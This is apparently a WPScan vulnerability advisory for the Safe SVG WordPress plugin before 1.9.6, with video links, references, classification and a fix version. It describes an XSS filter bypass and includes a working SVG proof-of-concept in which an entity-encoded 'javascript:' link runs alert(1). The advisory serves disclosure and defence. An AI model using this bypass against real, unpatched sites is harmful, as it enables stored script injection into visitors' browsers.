Safe SVG < 1.9.6 - XSS Protection Bypass



Description
By using entities in payload XSS will success to bypass the protection of the Safe SVG Plugin
Proof of Concept
Video POC (for <= 1.9.4): https://drive.google.com/open?id=19-sin0HB97L0tPMUAaGjgE5KjP4lXSuw

Create a SVG with payload below to trigger XSS:
```<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(1)">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg> ```

Video PoC for v1.9.5 : https://www.youtube.com/watch?v=hnQA2hc-4_k

Affects Plugin

fixed in version 1.9.6

References

URL https://github.com/darylldoyle/svg-sanitizer/issues/31
URL https://github.com/darylldoyle/safe-svg/issues/9

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher 0xd0ff9
Submitter 0xd0ff9
Submitter Website http://0xd0ff9.wordpress.com
Submitter Twitter https://twitter.com/Jok3rDb
Views 2127
Verified No
WPVDB ID 9942

Timeline

Publicly Published 2019-11-08 (11 days ago)
Added 2019-11-08 (10 days ago)
Last Updated 2019-11-08 (10 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin